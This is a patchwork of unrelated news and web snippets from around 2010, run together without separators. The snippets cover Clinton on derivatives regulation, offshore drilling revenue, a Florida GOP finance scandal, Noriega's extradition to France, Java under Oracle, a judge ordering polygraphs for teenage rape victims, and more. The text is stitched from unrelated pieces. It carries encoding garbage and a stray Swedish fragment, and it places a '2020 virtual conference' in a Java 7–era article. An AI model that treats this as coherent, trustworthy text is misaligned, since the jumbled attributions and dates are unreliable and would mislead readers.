" On derivatives , yeah , I think they were wrong and I think I was wrong to take [ their advice ] , " Clinton said , " because the argument on derivatives was that these things are expensive and sophisticated and only a handful of investors will buy them , and they do n't need any extra protection and any extra transparency .
The money they 're putting up guarantees them transparency .
I find it interesting that President Clinton is specifically calling out two of President Obama 's top economic advisors for , well , being wrong .
And not only that , but being spectacularly , dangerously wrong about something that damn near destroyed the economy :
The former president said he also was wrong in his understanding of what a collapse in the derivative market could do to the economy .
" The most important flaw , " he said , " was even if less than 1 percent of the total investment community is involved in derivative exchanges , so much money was involved that if they went bad , they could affect 100 percent of the investments , and indeed 100 percent of the citizens in countries , not investors .
And I was wrong about that . "
Obviously , the former President is very close to this administration , so I do n't believe he 's just shooting off his mouth for no reason .
I believe that the messaging is very deliberately timed , particularly with President Obama 's statement on Friday that he will veto any legislation that does n't regulate derivatives .
What 's so interesting here is his calling out of Summers and Rubin , who , as mentioned , are very high up among President Obama 's team of economic advisors .
What message is being sent ?
That they give bad advice about important things ?
That we should n't listen to them any more ?
And how does the Obama administration feel about this ?
Does this perhaps augur some change in direction for the White House ?
Here 's part one of the interview :
***********************************************************************
UPDATE :
Well , as Roseanne Rosannadanna used to say , never mind .
Jake Tapper provides an update :
After the show Sunday , Clinton Counselor Doug Band wrote me to say that " during the interview , reflecting on a derivatives debate that occurred twelve years ago , President Clinton inadvertently conflated an analysis he received on a specific derivatives proposal with then - Federal Reserve Chairman Alan Greenspan 's arguments against any regulation of derivatives . "
Band wrote that President Clinton " still wishes , as he has said several times , that he had pursued legislation to provide additional regulatory authority in this area , even though the Republican majority in Congress would have blocked such an effort .
And he remains convinced that he received excellent advice on the economy and the financial system from his economic team , led by treasury Secretaries Bentsen , Rubin and Summers ; that Chairman Greenspan served the nation well during those 8 years ; and that SEC Chairman Arthur Levitt , and others in regulatory positions fulfilled their responsibilities in a manner that supported remarkable growth without improvident risk . "
So , apparently he's not really throwing Summers and Rubin under the proverbial bus , which is unfortunate .
Still , the lessons seem to have been learned regarding derivatives .
President Obama 's plan for expanding offshore drilling along some U.S. coastlines holds the promise of new oil and gas production on virgin Atlantic seabed so far untouched by drill bits .
But senators drafting a broad climate and energy bill on Capitol Hill are considering proposals that could do more to boost offshore production , giving states power over nearby waters and the promise of lucrative drilling revenues .
The drilling plan Obama announced this week canceled lease sales in Alaska , walled off the Pacific Coast to new drilling and blocked exploration in Alaska 's Bristol Bay .
At the same time , the president opened the door to new drilling leases along the Atlantic seaboard from Delaware to mid-Florida , following seismic research and environmental studies .
Mixing approaches
Legislation focused solely on capping emissions would never pass the current Congress , predicted Sen. Lindsey Graham , R - S.C. , who is pushing the ideas in negotiations he is leading with Sens.
John Kerry , D - Mass. , and Joe Lieberman , independent - Conn .
The solution , Graham said , is to " combine concepts of controlling pollution and energy independence .
That 's where the votes are at . "
The idea is risky .
Every vote lured from oil - patch senators could be offset by lost support from coastal Democrats who worry that oil spills along neighboring states could contaminate their own shores .
States now take home 100 percent of the royalties and bids that energy companies pay to drill on waters in their jurisdiction , typically extending three miles from high - tide lines .
Florida and Texas ' territory stretches nine miles into the Gulf of Mexico .
Call of cash
But when drilling happens in federal waters outside the states ' control , a quarter of the revenue is funneled to the Federal Land and Water Conservation Fund , a 45 - year - old program that pays for government land purchases and local park projects .
The remainder goes entirely to the federal government , except for revenue from drilling in the Gulf of Mexico that can be split in half with Alabama , Louisiana , Mississippi and Texas .
Federal law now limits the 37.5 percent revenue sharing program to those states , but Senate climate bill negotiators are mulling expanding that to all coastal states .
Environmentalists fear that the prospect of drilling revenue would be too tempting for cash - strapped states struggling to balance budgets and pay for basic government services to resist .
" When you put cash in front of a financially starved legislature , everything looks more attractive , " said Dan Jacobson , legislative director for Environment California .
" If you dangle the idea of getting oil money , " that could be irresistible to lawmakers " trying desperately to keep schools and hospitals open . "
The result , Jacobson said , could be legislative battles pitting " the state 's crown jewels versus the state 's kids . "
California project
Even without a new federal - state revenue sharing program to up the ante , the issue is a live one in California , where Gov. Arnold Schwarzenegger , who opposes most offshore drilling , wants to help close the state 's $ 20 billion budget gap by allowing one specific drilling project near Santa Barbara .
If approved , Houston - based Plains Exploration and Production , Inc. , would conduct the drilling in state territory , off an existing platform in federal waters .
California bans drilling in state waters , but a loophole in the ban allows tapping an undersea oil field in state territory if some of the oil seeps into a federally controlled field .
With estimates of more than $ 100 million a year in royalties , the so - called Tranquillon Ridge project passed the California Senate in July before being rejected by the state Assembly .
Graham said Obama 's drilling plan was " a good first step , " but it needs more drilling incentives - including revenue sharing - to become a true " game - changer . "
States ' rights
Virginia 's two Democratic senators , Jim Webb and Mark Warner , are pushing for a " fair and equitable formula " for sharing revenues that would guarantee their state gets a portion of the money from planned exploration in federal waters about 50 miles off their coast .
They also are considering provisions that would give states much more control over what happens near their coastlines , allowing them to opt in to drilling ( and revenues ) within 35 miles or opt out for a bigger buffer of 70 miles .
Other senators , including California Democrat Dianne Feinstein , like the idea of opt - out provisions as a way to protect states from nearby drilling , no matter what the federal government decides .
Any state that wants drilling should first " pass legislation affirming that it desires to open the shores off its coast , " Feinstein said .
" On such a substantial decision about the future of a state , a decision should be made by both the legislature and the governor . "
Florida governor Charlie Crist has requested a federal investigation into the Republican Party of Florida as accusations of mismanagement and under - the - table deals continue to mount .
Crist ’s call for federal authorities to take over the probe followed a similar request from Florida Chief Financial officer Alex Sink , who also sent a request for intervention to the state attorney general Friday .
ADVERTISEMENT
“ It ’s a mess , ” Crist said .
“ This thing stinks . ”
Most of the “ mess ” centers around Jim Greer , the former Chairman of the state ’s Republican party .
Greer ’s personal finances are being investigated , especially for a secret contract he signed in 2009 that sent almost $ 200,000 in fundraising money to a private company of which Greer owns 60 percent .
An audit of the Republican Party of Florida ’s finances concluded that it could not justify tens of thousands of dollars expenses claimed by Greer .
He was forced out in January , but not before the state party offered him a severance package of $ 124,000 that also absolved him of wrongdoing .
Crist sent his request in a one - paragraph letter that stated “ the potential IRS implications , ” meaning Greer could be charged with tax - evasion .
The Florida governor ’s harshness is an abrupt reversal from his past championing of Greer , who Crist personally chose and appointed for chairmanship .
Crist defended Greer even though critics demanded his removal months ago .
Now Crist says he takes “ responsibility ” for placing Greer in a position of leadership .
ADVERTISEMENT
“ As the facts continue to come out , more and more knowledge is gained , ' ” Crist said .
“ The more knowledge you have , the more opportunity one has to evaluate and re-evaluate and determine what the appropriate action should be . ”
The accusations of wrongdoing do n’t stop with Greer .
Incoming Speaker Dean Cannon used one of his party credit cards to charge $ 200,000 over two - and - a - half years .
The Florida GOP ’s executive director and assistant to Greer , Delmar Johnson , racked up more than one million American Express points and $ 1,800 ofÃ ‚Â in - flight catering .
Parisian commuters may be surprised this week , as they step off the metro and into , well , a living room .
In their newest marketing campaign , IKEA has furnished four of Paris busiest metro stops with sofas , lamps and trompe l'oeil - like posters of cabinets and bookshelves .
Paris St. Lazare , Champs - Elyses Clmenceau , Concorde , and Opra subway stations have been invaded , or so says the brand .
The concept behind the campaign is akin to a test drive .
Passengers in transit can , via the bum test , experiment with the comfort and durability of IKEAs Ektorp and Kalstad couches and Brasa floor lamps .
Agence 14 Septembre , a communications group that specializes in architecture and design , collaborated with IKEA on the experiential initiative , which runs until March 24 .
The Scandinavian furniture manufacturer delivered a similar campaign last January when they set up a faux oval office in Washington D.C.s Union Station .
Yes , but not , perhaps , as non-religious as you might think .
A study just published in Sociology of Religion , by Neil Gross and Solon Simmons , reported that about 3/4ths of professors report some belief in God or a higher power .
About 35 % of professors are absolutely certain that God exists , while 21 % believe , but are not absolutely sure .
Only 10 % of professors are athiests and another 13 percent are agnostic .
So , is 23 percent many or only a few non-believers ?
On the one hand , it may seem like very few if you consider that the professoriate is routinely characterized as radically liberal and anti-religious .
As Shannon Golden at Contexts Crawler says :
Devout parents often worry about the “ secularizing ” effects of sending their children off to college .
They envision professors pushing secular thoughts and anti-religious values on their impressionable students .
Despite the stereotype , this data suggests that the majority of professors would welcome religious belief in their classrooms .
On the other hand , it may seem like a lot of athiests and agnostics if you compare the numbers to the general U.S. population .
According to the Pew Forum on Religious and Public Life , only 4 % of the U.S. population is athiest or agnostic ( see the data waaaay down at the bottom there ) :
From this perspective , 23 % is a lot .
So what do you think ?
Are you surprised by how few professors report being athiests or agnostics ?
Or are you surprised by how many ?
IF nine South Hadley , Mass. , high school students  seven of them girls  are proved to have criminally bullied another girl who then committed suicide , as prosecutors have charged , they deserve serious legal and community condemnation .
However , many of the news reports and inflamed commentaries have gone beyond expressing outrage at the teenagers involved and instead invoked such cases as evidence of a modern epidemic of “ mean girls ” that adults simply fail to comprehend .
Elizabeth Scheibel , the district attorney in the South Hadley case , declined to charge school officials who she said were aware of the bullying because of their “ lack of understanding of harassment associated with teen dating relationships . ”
A People magazine article headlined “ Mean Girls ” suggested that a similar case two years ago raised “ troubling questions ” about “ teen violence ” and “ cyberspace wars . ”
Again and again , we hear of girls hitting , brawling and harassing .
But this panic is a hoax .
We have examined every major index of crime on which the authorities rely .
None show a recent increase in girls ’ violence ; in fact , every reliable measure shows that violence by girls has been plummeting for years .
Major offenses like murder and robbery by girls are at their lowest levels in four decades .
Fights , weapons possession , assaults and violent injuries by and toward girls have been plunging for at least a decade .
The Federal Bureau of Investigation ’s Uniform Crime Reports , based on reports from more than 10,000 police agencies , is the most reliable source on arrests by sex and age .
From 1995 to 2008 , according to the F.B.I. , girls ’ arrest rates for violent offenses fell by 32 percent , including declines of 27 percent for aggravated assault , 43 percent for robbery and 63 percent for murder .
Rates of murder by girls are at their lowest levels in at least 40 years .
Slipp trötthet - och demens .
Ny forskning visar att D- vitamin inte bara stärker immunförsvaret - utan även kan minska risken för Parkinsons ...
Arguably the most interesting revelation from this non-inquiry was the admission by Professor Julia Slingo of the Met Office that it uses the same computer models for short - term weather forecasting as it does to predict climate 100 years ahead .
Three years running these models have come so unstuck with their predictions of " barbecue summers " and " milder than average winters " that the Met Office has now abandoned its seasonal forecasts .
Had the MPs asked her why , therefore , the models ' long - term forecasts should be regarded as any more reliable , they might have shown a spark of intelligence .
As it is , when it comes to official inquiries into Climategate , we are now one pointless whitewash down with two more to come .
Work Directly with a Certified Criminal Law Specialist
At the Phoenix Law Office of Rachelle S. Ferraro , we believe in handling every case the way we would our own .
When you retain us , you meet with and work directly with Certified Criminal Law Specialist , Rachelle S. Ferraro , throughout your case .
You will not be passed off to an associate attorney nor will you be treated like you are in a mill .
Rachelle S. Ferraro has almost 22 years of experience as a Criminal Defense Attorney in Arizona and has tried over 90 jury trials .
Ms. Ferraro has been certified as a Criminal Law Specialist by the State Bar of Arizona Board of Legal Specialization continuously since 2006 .
If you are being investigated for or have been charged with a crime in Phoenix , in Maricopa County or anywhere in Arizona , call 602-795-0770 or contact us through email to set up a free consultation .
Experienced Criminal Defense Attorney Fighting for You
Attorney Rachelle Ferraro has practiced criminal defense in Arizona since 1998 .
She has seen changes in the criminal law and in victim rights over the years , some better and some worse than others .
But through all those years , she has learned that not all cases and not all circumstances are the same .
A conviction or even just the allegation that a crime was committed may have much harsher consequences on one person over another .
If you have been charged with a crime in Arizona , contact us at 602-795-0770 or send us an email to devise a strategy suited to best address your specific situation .
Rachelle Ferraro has gained a reputation throughout Arizona as being both an aggressive trial attorney and also a tactful negotiator .
Current and former clients include police officers , prosecutors , judges and their friends and family .
Erections work kind of like a balloon filled with pressurized blood instead of pressurized air .
HowStuffWorks.com
When you want to move nearly any part of your body , you do it using muscles .
Whether you 're moving your fingers , toes , arms or legs , muscles do the work .
Even when you stick your tongue out , you do it using muscles :
You think about moving some part of your body .
The appropriate muscles contract .
That part of the body moves .
Muscles let you move your body voluntarily with precise control .
Advertisement
Advertisement
The penis , on the other hand , is completely different .
There are no muscle contractions involved in making the penis erect .
To become erect , the penis instead uses pressure .
" " The penis handles two tasks : urination and ejaculation .
HowStuffWorks.com
Probably the easiest way to understand how the penis becomes erect is to think about a balloon .
If a balloon has no air in it , it 's limp .
As you inflate a limp balloon with just a little air , it becomes elongated and rigid .
The penis uses a similar mechanism , but instead of using pressurized air to become rigid , the penis uses pressurized blood .
The penis contains two cigar - shaped structures , called corpora cavernosa ( singular : corpus cavernosum ) , that it uses to become erect .
Think of the corpora cavernosa as balloonlike tubes .
Arteries­ bring blood into these two tubes , and veins carry blood away from them .
The penis can be either limp or erect , depending on the flow of blood :
In a non-erect state , the arteries that transport b­lood into the corpora cavernosa are somewhat constricted , while the veins that drain the blood from the penis are open .
There is no way for pressure to build inside the penis .
In this state , the penis is limp .
When a man becomes aroused , the arteries leading into the penis open up so that pressurized blood can enter the penis quickly .
The veins leaving the penis constrict .
Pressurized blood is trapped in the corpora cavernosa , and this blood causes the penis to elongate and stiffen .
The penis is erect .
If the arteries leading to the penis do n't open up properly , it 's difficult or impossible for a man 's penis to become erect .
This problem is the leading cause of erectile dysfunction ( ED ) .
To solve an erection problem when the cause is poor blood flow , you need to open the arteries .
Let 's take a look at how this can be done -- and how it was done before Viagra .
You know SETI , the nice folks out in California who scan the stars for radio transmissions , hoping to find evidence of E.T .
You are probably also aware that this strategy has n't exactly panned out .
( Quick clarification :
The preceding does not mean I think SETI is n't productive — they 're involved in a lot more work than simply scanning for alien life , and that work contributes to science and space exploration in important ways .
They have n't found E.T. yet , but they still rock . )
Now , some physicists are starting to pipe up , suggesting that SETI 's problem maybe is n't so much a lack of aliens , but an over - dedication to searching for one , narrowly defined artifact of intelligent life .
SETI is space archaeology , they say .
And current practice is the equivalent of studying ancient Earth - bound civilizations using nothing but flint spear points — there 's a lot of cultures you 'd completely miss , because their technology was more advanced .
Paul Davies , a physicist at Arizona State University , points out that widespread radio communications may prove a short - lived historical phenomenon on Earth .
Humans are , after all , increasingly using fibre optics to talk to each other .
Moreover , many modern radio devices ( such as mobile phones ) rely on a technique called " spread spectrum " encoding .
It uses signals that look like background noise , except to a receiver equipped with the right unscrambling code .
Radio signals that are clearly artificial in origin may , then , be only a transient sign of civilisation .
What to look for , instead ?
Scientists interviewed by The Economist suggested everything from pollution ( the fact that there are Earth - based telescopes capable of studying the atmospheric composition of planets outside our solar system is mind - blowing enough on its own ) , to evidence of intelligent tampering with the energy output or aging process of distant suns .
The Centauri Dreams blog gets into those later , sci - fi inspired possibilities a bit more in - depth .
It seems like the key to this new approach is looking ahead in our own development , rather than behind or alongside , for searchable signals of intelligent life .
And that 's fascinating , not just for its possibility in the field of alien hunting , but for the questions it forces us to ask about Earth - bound technologies .
Things like :
Is there a better way we could be doing some of our basic techie activities , and how soon would it be able to supplant current methods ?
What might we be capable of in 1000 years , and what impact could that technology leave on our planet and our solar system ?
At the very least , I fully expect this line of inquiry to lead to some great , new literature — and maybe some usable tech ideas , too .
( Via Lee Billings )
Image courtesy Flickr user pasukaru76 , via CC
WASHINGTON ( The Street ) -- President Barack Obama 's proposed budget would shift $ 112 billion away from the nation 's top earners in 2012 , according to the Tax Foundation , a nonprofit organization that monitors federal and state fiscal policies .
The group analyzed the impact of the 10 - year budget proposal on various income groups .
The study , released last week , said higher - income families would lose the most because of the expiration of Bush administration tax cuts and the proposed 28 % cap on certain deductions .
Low - income and middle - class families stand to benefit from the redistribution .
" We asked two simple questions , " says Tax Foundation Senior Economist Gerald Prante , co-author of the report .
" ' How much in federal taxes does a given income group pay under a given set of tax policies ? ' and ' How much in federal taxes would that income group pay under a benefit principle system of taxation , in which a family 's tax share is equal to its share of government spending benefits ? '''
The difference between those two assessments formed the basis of the income redistribution prediction .
The group excluded budget items related to the jobs initiative , health care reform and climate change from its analysis , citing the lack of specifics available .
Families in the bottom 10 % income bracket benefit the most from the proposed budget and stand to receive an additional $ 8.7 billion in federal spending benefits .
On average , compared to the current budget , a family in this range would receive an additional $ 494 from income redistribution , a total of $ 17,962 in federal spending benefits .
Those earning up to $ 107,000 would also benefit , according to the foundation 's calculations .
Families in the 60th to 70th market income percentile would receive an additional $ 8 billion in tax benefits , an average income redistribution of $ 475 .
Those higher up the income scale would see increased taxes as benefits shift .
Compared to the current policy , the proposed budget would move an additional $ 101,314 away from the highest earning 1 % of U.S. residents , a total income hit of $ 509,257 per family .
The top 5 % income bracket would forgo an additional $ 20,304 a year ( a total of $ 141,648 ) and the top 10 % would lose out on nearly $ 9,000 a year through additional income redistribution .
-- Reported by Joe Mont in Boston .
Last week we came across these tiny sea urchinshells at a beach shop , thin and light as eggshells .
What to do with them ?
Light them up with LEDs , of course !
We ’ve seen sea urchin lamps before , but they ’ve always been made with large ( i.e. , sturdy ) and colorful ones .
In contrast , these tiny ones might be better to hang around christmas lights like little paper lanterns .
Just a throwie sans magnet ( Urchie ? ) , tucked into the shell .
Each one has a hole in the bottom large enough to fit a pretty good size LED , although not necessarily the battery as well .
The natural beauty and structure of these shells is amazing ; they must have been even more beautiful when they were alive .
Hi-res versions of all of these photos are available in this photo set .
So you think you 're a connoisseur , what with your cans of Beluga , Kobe steaks and stash of 1998 Dom Perignon ?
Think again if you have n't gotten your hands on cannabis caviar , a new kind of top - shelf marijuana popping up at Colorado dispensaries that sells for the astronomical price of $ 1,400 an ounce -- nearly four times the average price of other high - grade strains .
" This is n't stuff you are sitting around puffing all day , " says Jake , general manager of the ReLeaf Center , a Denver dispensary that 's selling caviar made in house for $ 60 a gram .
" This is the definition of a one - hitter quitter . "
It ain't your grandpa 's pot .
Caviar is made by soaking marijuana buds in a potent stain of hash oil -- thick , sticky and concentrated liquid cannabis made from dissolving hashish or marijuana in solvents like acetone , alcohol or butane .
Once the oil 's soaked into the marijuana buds , the whole shebang is allowed to dry for several weeks or months .
The result is a potent marijuana smorgasbord : high - grade marijuana , with between 5 and 20 percent THC , infused with 30 to 80 percent THC hash oil .
It also burns for long periods of time , notes Jake , although he adds a word of caution about taste : " It 's rough . "
People looking for a smooth - tasting product should look elsewhere , he says .
" It 's for people who want to smoke less , need longer effects , or have medical needs that absolutely require them to take large amounts of THC in .
It 's going to have a stronger medical benefit . "
That 's putting it mildly .
To try some for yourself , keep an eye out for " caviar " on the top shelf of your local dispensary .
It 's also been called " California Raisins , " though as Jake notes , " That name is falling out of favor in the ongoing weed war between Colorado and California . "
And with stuff like caviar , we just might have one up on our marijuana - loving neighbors to the west .
The U.S. extradited former Panamanian dictator Manuel Noriega to France on Monday , clearing the way for him to stand trial there on money laundering charges .
Enlarge AP Former Panamanian dictator Manuel Noriegawas ousted as Panama 's leader and put on trial following a 1989 U.S. invasion that drove him from power .
WASHINGTON ( AP )  Former Panamanian dictator Manuel Noriega arrived in France on Tuesday to face money laundering charges after being extradited from the United States .
His lawyers are seeking his immediate release , saying his detention and transfer are unlawful .
A new legal battle will now begin for the 76 - year - old former strongman , who was ousted in a U.S. invasion in 1989 and went on to spend two decades behind bars near Miami for drug racketeering .
Noriega landed at Paris ' Charles de Gaulle airport Tuesday morning on a direct flight from Miami .
He will face a prosecutor to hear the French charges Monday , and then see a judge in Paris who will determine whether he should be jailed pending an eventual trial , Yves Leberquier , one of Noriega 's defense lawyers , said .
U.S. Secretary of State Hillary Rodham Clinton has signed a so - called surrender warrant for Noriega after a federal judge in Miami lifted a stay blocking the extradition last month .
French authorities claim Noriega laundered some $ 3 million in drug proceeds by purchasing luxury apartments in Paris .
Noriega was convicted in absentia , but France agreed to give him a new trial if he was extradited .
Leberquier told The Associated Press that he would ask the prosecutor on Monday to release Noriega immediately , arguing it 's illegal to try a former head of state who should have immunity from prosecution .
Other legal objections are that Noriega is considered a prisoner of war , a status Leberquier said French jails are n't ready to accommodate , and that the charges against him are no longer valid because the acts he is accused of happened too long ago , the lawyer said .
Noriega was declared a POW after his 1992 drug conviction by a Miami federal judge .
In Miami , Noriega had separate quarters in prison , the right to wear his military uniform and insignia , access to a television and monitoring by international rights groups .
" We 're not here to eventually make a moral judgment , we 've got legal rules that have to be applied and respected , " Leberquier told AP before heading to the Paris prosecutor 's office .
" For justice to be served , the judiciary must acknowledge it is incompetent to put him on trial " in France , he said .
Leberquier said Noriega was delayed during his ride from the airport to central Paris by protesting French farmers blocking the road with tractors .
French Justice Ministry spokesman Guillaume Didier said Noriega could go on trial within two months .
Panama also has an outstanding request for the former dictator 's extradition .
He was convicted in Panama in absentia and sentenced to 60 years in prison on charges of embezzlement , corruption and murdering opponents .
Panama 's foreign minister , Juan Carlos Varela , told reporters that Panama respects the U.S. decision to extradite Noriega but will still try to get him back to Panama " to serve the sentences handed down by Panamanian courts . "
Noriega was ousted as Panama 's leader and put on trial following a 1989 U.S. military invasion ordered by President George H.W. Bush .
Noriega was brought to Miami and was convicted of drug racketeering and related charges in 1992 .
Sandra Noriega , one of the former dictator 's three daughters , called Noriega 's extradition to France " a violation of his rights as a citizen , and a failing by the ( Panamanian ) government , which is supposed to protect its citizens . "
Noriega was Panama 's longtime intelligence chief before he took power in 1982 .
He had been considered a valued CIA asset for years , but as a ruler he joined forces with drug traffickers and was implicated in the death of a political opponent .
Copyright 2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
As if Oracle did not have enough work convincing MySQL users of its good intentions , the company also should set its sites on getting the Java platform back on track , contends a Google chief architect .
The Java platform has " appeared rudderless for the last few years , " said Google 's chief Java architect , Josh Bloch , speaking Wednesday at the Red Hat Middleware 2020 virtual conference .
" A malaise [ has fallen ] over the community and the end is not in sight . "
While Bloch admitted that the platform , which supports not only the Java language but other languages that run on the Java Virtual Machine such as Groovy and JavaFX , remains popular , he also stated that it has been beset by a number of problems .
" Technical and licensing disputes over the last few years have been highly detrimental .
They 've sapped the energy of the community and caused plenty of bad press , " he said .
The problems around Java that Bloch mentioned largely predate Oracle 's acquisition of Sun Microsystems , which oversaw the Java development process , and Bloch called on Oracle to step up as the prime steward of the language and associated platform software .
" Oracle should take the lead of Java once again , " he said .
Bloch cited a number of shortcomings : the length of time between new versions of Java continue to grow ; Java 7's ship date keeps slipping back ; the future of the Java Community Process ( JCP ) remains murky .
He noted that the code base is , for the first time , in danger of being forked .
Perhaps the largest drag on Java is its myriad licensing conditions , Bloch said .
" The main thing that is hurting Java now is that there is a jungle of licensing , " he said .
As an example , he pointed to the existence of Apache Java Harmony , an alternative open - source implementation of Java that was developed to avoid Sun 's licensing restrictions .
Bloch singled out the Java 2 Micro Edition ( J2ME ) as stagnating and falling behind the times .
J2ME was not designed for the amount of power that devices have today .
" It does n't make sense to use a restrictive platform , " he said , adding that the platform is in no shape to compete with the likes of Apple 's iPhone .
At least one index of programming - language usage has found that Java is on a downward trend .
Tiobe Software surveys the usage of programming languages by checking the number of mentions each language gets on Web search engines .
For the first time in four years , Java , normally the most - cited language , has been surpassed in popularity by the C programming language .
Tiobe attributes this decline to the growing use of other , simpler , languages that use the Java Virtual Machine .
Oracle has been under increasing scrutiny for its handling of Sun 's open - source technology , not only with Java , but with MySQL as well .
Not helping with the perception , Java founder James Gosling has left the company .
Yet Bloch sees Oracle as Java 's savior .
He pointed to the December 2007 resolution that Oracle put forth to the JCP of " an open independent vendor - neutral Standards Organization where all members participate on a level playing field . "
Bloch said that the future success of Java would depend on this vendor - neutral setting , and he said he saw no reason why Oracle would no longer support this move .
He also called on Oracle to simplify Java licensing .
The company could also provide a " true leader " for Java , one who " commands the respect of the technical community and one who can get releases out on a regular schedule with a clear focus , " Bloch said .
Despite these issues , Bloch nonetheless expressed optimism for the future of the language , noting that any technology with as much inertia as Java will be around for a while .
" The king is not dead .
The king is alive and well .
He has a slight cold , " he said .
Later in the Web conference , Vijay Seetharaman , Hewlett - Packard 's global Java capability lead manager for the company 's enterprise services division , echoed many of Bloch 's concerns , noting that the development of the language has stagnated and that it has been outgunned in the mobile space .
But , like , Bloch , he saw Java as continuing to be a presence for some time to come .
" Java will remain a dominant platform in the enterprise space , " he said .
With Leila Atassi
CLEVELAND , Ohio --
A Juvenile Court judge has ordered three teenage girls who were victims of sexual assault to submit to polygraph tests , baffling prosecutors and upsetting the victims .
Cuyahoga Juvenile Court Judge Alison
Floyd ordered victims connected with four separate cases to be examined after she had found their attackers delinquent , the Juvenile Court equivalent of guilty .
Floyd also ordered the teenage boys who were accused of rape and other sex crimes in those cases to undergo polygraph examinations as part of an assessment done before the teens would be sentenced .
None of the teen victims has followed the judge 's order .
Floyd did not respond to three days of attempts to contact her for comment .
It is unclear from her orders what Floyd 's intention was in having victims take polygraph exams or what questions would be asked of them .
" The situation made no sense to us , " the mother of a 16 - year - old victim said in a message relayed through Cleveland Rape Crisis Center Director of Advocacy Ashley Hawke .
" I believe even more damage was done by the judge letting the perpetrator know she was ordering the victim to take the polygraph .
He apparently took this to mean the judge did not believe her and he used this to tell their peers that the judge did not believe her and was ordering her take a lie detector test , " the mother wrote .
" It felt like the blame was back on her and she was being victimized , by not only him [ again ] , but by the system as well . "
Prosecutor Bill Mason 's office so far has filed briefs in two of the cases , asking Floyd to stop ordering rape victims to submit to polygraph tests .
The judge does not have authority over victims , according to the motion filed by Assistant County Prosecutor Nicole Ellis .
She argued that the judge 's order also violated the state 's rape shield law and public policy .
" It is clear that the court is attempting to re-investigate the case after the child was found delinquent , " Ellis wrote .
" The legislature enacted the rape shield statute to protect victims from undue harassment , a tendency in sexual assault cases to try the victims rather than the defendant . "
Megan O'Bryan , president and CEO of the Rape Crisis Center , said the center -- which is assisting three of the victims -- does not condone the polygraph tests for sexual assault survivors .
" It violates federal law mandated through the 2005 Violence Against Women Act , " O'Bryan said in an e-mail this week .
" The practice puts us at risk for losing critical VAWA funding and philosophically is not victim - centered , especially for those reporting rape .
" The practice could be intimidating for rape survivors who already have difficulty in coming forward , and sends a message that their story is not believed , " she said .
Robin Palmer is director of The Mokita Center , which contracts with the Juvenile Court to do assessments , counseling and monitoring of juveniles charged with sex- related crimes -- which sometimes includes polygraph testing .
Palmer has been trained and has conducted polygraph exams since 1996 .
She said the exams in general can be useful for police investigations and for treatment and monitoring of offenders after they have been convicted .
But it is not always appropriate .
" You want to make sure you are doing polygraphs for the right reasons and following best practices , " Palmer said .
She said she does n't recall examining victims in sexual assault cases unless it was at the victim 's request .
Court administrators told Palmer the court would not pay for the examinations Floyd ordered , leaving the victims responsible for the cost .
The examination of victims is not included in the court 's contract , court Administrator Marita Kavalec said .
Beyond that , she said the court would prefer not to comment on any matter pending in front of any judge .
Here 's what the cover looks like .
Yahoo ! is publishing its own stylebook for the Internet .
" The Yahoo !
Style Guide : The Ultimate Sourcebook for Writing , Editing , And Creating Content For The Digital World " will hit stores on July 6 , 2010 at $ 21.99 for retail .
Amazon will sell it for $ 13.49 before shipping .
Here 's a photo of the galley , snapped by PaidContent 's Rafat Ali .
Chris Barr , Yahoo's senior editorial director and CNET 's founding editor - in - chief , is the top editor of the book , along with other senior editors at Yahoo !.
According to Amazon 's description of the book : " Is it Web site , website , or web site ?
What ’s the best on - screen placement for a top story ?
How can I better know my site ’s audience ?
The rapid growth of the Web has meant having to rely on style guides that are intended for print publishing , such as The Chicago Manual of Style , Strunk and White ’s The Elements of Style , or The Associated Press Stylebook .
But these excellent guides do not address writing for the Internet . "
Well , actually , the AP Stylebook does address many Web terms .
But could Yahoo !'s book compete with the traditional bible for media writing ?
We called up AP Stylebook 's product manager , Colleen Newvine , who said their guide " has been evolving to include more online guidance . "
She told us AP Stylebook 's 2010 edition , which should hit printers this week , will include a social media section .
It will define some terminology like " crowdsourcing " and " retweeting , " but also some tips on how to use social media effectively as a reporter .
" There is definitely a recognition that writers are not all working with ink on paper , " she said .
" So many reporters are multi-platform rather than single platform , for print or online or whatever the next thing is . "
Maybe there will soon be a guide for iPad app writers !
As for competition like Yahoo ! 's Style Guide , " there have always been multiple stylebooks out there , " she said .
" It will be up to writers and readers to decide whether one serves their needs more than others . "
So who is going to buy it ?
Perhaps all those new Yahoo !
News reporters will pick up a copy .
Here is their full description of the book , as posted on Amazon :
Is it Web site , website , or web site ?
What ’s the best on - screen placement for a top story ?
How can I better know my site ’s audience ?
The rapid growth of the Web has meant having to rely on style guides that are intended for print publishing , such as The Chicago Manual of Style , Strunk and White ’s The Elements of Style , or The Associated Press Stylebook .
But these excellent guides do not address writing for the Internet .
The Yahoo ! Style Guide does .
Writers and programmers at Yahoo ! , faced with a lack of industry guidance fifteen years ago , began cobbling together a set of guidelines for Web writing .
The seeds of The Yahoo !
Style Guide were planted with their first in - house reference guide , and Yahoo !
content creators have built and added to the guide ever since , making it the go - to manual inside Yahoo !.
Polished and expanded for its public debut , this resource will cover the basics of grammar and punctuation as well as Web - specific ways to perfect a site , such as :
• Identifying the audience and making the site accessible to everyone
• Constructing clear and compelling copy
• Developing a site ’s unique voice
• Streamlining text for mobile devices
• Optimizing Web pages to increase the chances of appearing in search results
• Streamlining text so that people can read your pages at Internet speed .
The Yahoo !
Style Guide will help anyone who writes , edits , or designs for the Internet accomplish their work with clarity and precision .
21 Weird Family Photographs
Worst , strangest , weirdest photos selected from your family photo albums selected and published in a single article for your entertainment ( or embarrassment ) .
I bet you pray to God that none of your family photos are here .
If they are not , enjoy this funny collection .
If you find some of your photos here , please let us know more about your photo , and where it was taken .
Othervise , enjoy these funny family photographs and try to find what is strange about each and every one of them …some are obvious , other can be rather subtle …
A 13 - YEAR - OLD gatecrasher allegedly raped a 15 - year - old girl after slitting her throat at a party in Toowoomba , in southeast Queensland .
The defendant cried when he appeared in Toowoomba Children 's Court yesterday charged with multiple offences .
Police allege he arrived uninvited to a house party in Harristown on Saturday night , before a fight broke out .
The 13 - year - old was asked to leave but allegedly twice slashed his female victim 's neck with a razor blade or knife .
It was alleged he then returned a short time later and raped the same girl .
He was charged with rape , deprivation of liberty and assault occasioning bodily harm while armed .
